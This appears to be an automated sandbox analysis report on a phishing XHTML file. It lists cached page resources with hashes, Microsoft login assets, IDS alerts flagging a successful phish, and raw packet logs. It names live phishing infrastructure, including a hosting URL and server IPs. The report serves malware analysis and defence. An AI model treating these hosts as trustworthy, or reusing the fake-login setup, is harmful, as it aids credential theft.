Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.790574586070979
TrID:	HyperText Markup Language (15004/1) 83.32% Text - UTF-8 encoded (3003/1) 16.68%
File name:	Play_VM-Now(apply)VWAV.xhtml
File size:	2'906 bytes
MD5:	18ab9c88e454f2a247243928a1c06b41
SHA1:	a74b9d781c715c8c5e3b252c78a75726649e65f7
SHA256:	c86babeebb79b78763d3b731584c737e88c07c40ab92ab80bc65d90439c2d891
SHA512:	03614795b223ff9a2dee1489b1ebbb396c3d448c285c4a50376ddda8f003bcdca20abd16cf3d260c14666805d85ec00c363680eb90173238d6d26a8955db8d12
SSDEEP:	48:3VmIAqy8MT2QDXPX4dp6Ivoje4Pne2lTSAoS+M0umk:VAbfDodpIEAz
TLSH:	035157585DD2D54040B58362E7F7F218FE63019B620089447ECDB65B2F75F8584A7BE8
File Content Preview:	...<?xml version="1.0" encoding="UTF-8"?>..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN".. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" lang="en">..<head>.. <meta http-

Static OLE Info

General

Document Type:	Text
Number of OLE Files:	1

OLE File "Play_VM-Now(apply)VWAV.xhtml"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-24T14:43:05.350103+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49729	104.168.138.190	443	TCP
2025-03-24T14:43:33.074247+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49740	104.168.138.190	443	TCP
2025-03-24T14:43:44.815622+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49752	104.168.138.190	443	TCP
2025-03-24T14:43:53.679145+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49757	104.168.138.190	443	TCP
2025-03-24T14:44:05.620879+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49762	104.168.138.190	443	TCP
2025-03-24T14:44:14.551242+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49767	104.168.138.190	443	TCP
2025-03-24T14:45:05.977422+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49773	104.168.138.190	443	TCP
2025-03-24T14:45:14.939093+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.6	49778	104.168.138.190	443	TCP

Network Port Distribution

Total Packets: 553
• 8233 undefined
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 14:42:00.747397900 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:01.059245110 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:01.496823072 CET	49672	443	192.168.2.6	204.79.197.203
Mar 24, 2025 14:42:01.668806076 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:02.871766090 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:05.278012037 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:10.168632030 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:11.106110096 CET	49672	443	192.168.2.6	204.79.197.203
Mar 24, 2025 14:42:15.832117081 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:15.832158089 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:15.832277060 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:15.832413912 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:15.832427979 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:16.025800943 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:16.025870085 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:16.027168036 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:16.027179003 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:16.027411938 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:16.075097084 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:17.030292988 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.030345917 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:17.030580997 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.030814886 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.030826092 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:17.459579945 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:17.460329056 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.460958004 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.460964918 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:17.461205006 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:17.461911917 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:17.504321098 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078026056 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078048944 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078064919 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078144073 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.078150988 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078196049 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.078274012 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078289986 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078377962 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.078383923 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.078418970 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.284739971 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284763098 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284845114 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284885883 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.284893036 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284933090 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.284944057 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284965038 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.284970045 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.284993887 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.285018921 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.285062075 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.286819935 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.286829948 CET	443	49711	139.28.36.38	192.168.2.6
Mar 24, 2025 14:42:18.286850929 CET	49711	443	192.168.2.6	139.28.36.38
Mar 24, 2025 14:42:18.636193991 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.636254072 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:18.636363029 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.636527061 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.636547089 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:18.947309971 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:18.947376013 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.948509932 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.948523045 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:18.948779106 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:18.949081898 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:18.996326923 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.392988920 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393018007 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393044949 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393140078 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.393173933 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393192053 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.393218994 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393246889 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393284082 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.393290043 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.393317938 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.393317938 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.393343925 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.542695999 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.542718887 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.542834997 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.542866945 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.542916059 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543040991 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543056011 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543092966 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543100119 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543158054 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543240070 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543509007 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543526888 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543560028 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543569088 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543596029 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543611050 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543884993 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543904066 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543934107 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543941975 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.543965101 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.543983936 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692205906 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692233086 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692362070 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692394018 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692445040 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692504883 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692519903 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692584038 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692594051 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692606926 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692663908 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692827940 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692827940 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.692838907 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.692907095 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693058014 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693082094 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693130016 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693135023 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693145037 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693167925 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693197012 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693205118 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693223953 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693259954 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693536997 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693558931 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693588972 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693597078 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693622112 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693634987 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693849087 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693866014 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693902016 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693908930 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.693937063 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.693958044 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.771972895 CET	49678	443	192.168.2.6	20.42.65.91
Mar 24, 2025 14:42:19.842183113 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.842207909 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.842292070 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.842350960 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.842406034 CET	49712	443	192.168.2.6	185.174.100.20
